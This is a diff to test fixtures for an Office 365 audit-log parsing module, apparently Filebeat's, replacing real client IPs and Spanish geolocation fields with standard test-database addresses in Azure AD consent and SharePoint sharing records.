@@ -15136,8 +14948,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Consent to application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -15152,7 +14964,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 469256, + "log.offset": 469068, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -15181,9 +14993,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -15276,20 +15088,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -15300,8 +15110,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Consent to application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -15316,7 +15126,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 473830, + "log.offset": 473640, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -15345,9 +15155,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15440,20 +15250,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -15464,8 +15272,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment grant to user.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -15480,7 +15288,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 478404, + "log.offset": 478212, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -15509,9 +15317,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15601,20 +15409,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -15625,8 +15431,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment grant to user.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -15641,7 +15447,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 482728, + "log.offset": 482534, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -15670,9 +15476,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -15762,20 +15568,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -15786,8 +15590,8 @@ }, { "@timestamp": "2020-02-11T16:45:42.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add app role assignment grant to user.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -15802,7 +15606,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 487052, + "log.offset": 486856, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -15831,9 +15635,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-11T16:45:42", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15923,20 +15727,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log index 1e4f08e2f593..4a19cf476566 100644 --- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log +++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log 
@@ -3,8 +3,8 @@ {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","ItemType":"Web","TargetUserOrGroupName":"SIEMTest Owners","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","Operation":"AddedToGroup","ClientIP":"","EventData":"Site Owners","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"Version":1,"TargetUserOrGroupType":"SecurityGroup","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","UserId":"app@sharepoint","CreationTime":"2020-02-17T16:59:50","UserAgent":"","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07","UserType":0} {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","ItemType":"Web","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","TargetUserOrGroupName":"SIEMTest Members","Operation":"AddedToGroup","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIP":"","EventData":"Site Members","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"Version":1,"TargetUserOrGroupType":"SecurityGroup","UserId":"app@sharepoint","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","UserAgent":"","CreationTime":"2020-02-17T16:59:50","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"483f657f-9141-45fc-b141-08d7b3caccfb","UserType":0} {"Site":"9d58b52e-2adb-4976-8c1f-9932c32a8bd2","ObjectId":"https://testsiem.sharepoint.com/sites/SIEMTest","ItemType":"Web","TargetUserOrGroupName":"SHAREPOINT\\system","UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","SiteUrl":"https://testsiem.sharepoint.com/sites/SIEMTest","Operation":"AddedToGroup","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","ClientIP":"","EventData":"Site 
Owners","Workload":"SharePoint","EventSource":"SharePoint","RecordType":14,"TargetUserOrGroupType":"Member","Version":1,"UserId":"app@sharepoint","WebId":"54cfe39c-0e16-4f8e-bd62-f2ac40248083","CreationTime":"2020-02-17T16:59:49","UserAgent":"","CorrelationId":"4464369f-303c-b000-7cb1-c0cce4f2da18","Id":"13004a30-d15a-48a5-16ec-08d7b3caccc0","UserType":0} -{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links","ItemType":"List","UserKey":"i:0h.f|membership|1003200096971f55@live.com","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingInheritanceBroken","ClientIP":"79.159.10.151","EventData":"FalseFalse","Workload":"OneDrive","SourceRelativeUrl":"Sharing Links","EventSource":"SharePoint","ListId":"b108938d-3546-4359-925d-a1b54b4db8c2","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","Id":"dd162cd7-5df5-4fef-078a-08d7b17b4e95","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","UserType":0} -{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"AnonymousLinkCreated","EventData":"Edit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","UniqueSharingId":"d323b5ea-ceca-4d65-a628-e22ca9296a76","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"79.159.10.151","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9","UserType":0} -{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","TargetUserOrGroupName":"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76","Operation":"SharingSet","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","EventData":"Contribute","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"a8c23ab8-9447-4824-3208-08d7b17b4e5e","UserType":0} 
-{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","TargetUserOrGroupName":"Limited Access System Group","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"Limited Access","RecordType":14,"ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"79.159.10.151","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"88a041e3-2f3a-483c-cf76-08d7b17b4e5b","UserType":0} -{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0} +{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links","ItemType":"List","UserKey":"i:0h.f|membership|1003200096971f55@live.com","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingInheritanceBroken","ClientIP":"216.160.83.57","EventData":"FalseFalse","Workload":"OneDrive","SourceRelativeUrl":"Sharing Links","EventSource":"SharePoint","ListId":"b108938d-3546-4359-925d-a1b54b4db8c2","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","Id":"dd162cd7-5df5-4fef-078a-08d7b17b4e95","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","UserType":0} 
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"AnonymousLinkCreated","EventData":"Edit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","UniqueSharingId":"d323b5ea-ceca-4d65-a628-e22ca9296a76","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"216.160.83.57","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9","UserType":0} +{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","TargetUserOrGroupName":"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76","Operation":"SharingSet","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","EventData":"Contribute","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 
Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"216.160.83.57","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:45","Id":"a8c23ab8-9447-4824-3208-08d7b17b4e5e","UserType":0} +{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","TargetUserOrGroupName":"Limited Access System Group","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"Limited Access","RecordType":14,"ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","SourceFileName":"Screenshot.png","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","SourceFileExtension":"png","ClientIP":"216.160.83.57","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SharePointGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"88a041e3-2f3a-483c-cf76-08d7b17b4e5b","UserType":0} 
+{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"216.160.83.57","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0} diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json index 504cc25e971d..b6d0cabb7341 100644 --- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json @@ -261,8 +261,8 @@ }, { "@timestamp": "2020-02-14T18:25:45.000Z", - "client.address": "79.159.10.151", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57", + "client.ip": "216.160.83.57", "event.action": "SharingInheritanceBroken", "event.category": "web", "event.code": "SharePointSharingOperation", 
@@ -279,7 +279,7 @@
 "input.type": "log",
 "log.offset": 3965,
 "network.type": "ipv4",
- "o365.audit.ClientIP": "79.159.10.151",
+ "o365.audit.ClientIP": "216.160.83.57",
 "o365.audit.CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db",
 "o365.audit.CreationTime": "2020-02-14T18:25:45",
 "o365.audit.EventData": "FalseFalse",
@@ -302,20 +302,19 @@
 "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
 "o365.audit.Workload": "OneDrive",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "79.159.10.151",
+ "related.ip": "216.160.83.57",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "79.159.10.151",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "tags": [
 "forwarded"
 ],
@@ -333,8 +332,8 @@
 },
 {
 "@timestamp": "2020-02-14T18:25:45.000Z",
- "client.address": "79.159.10.151",
- "client.ip": "79.159.10.151",
+ "client.address": "216.160.83.57",
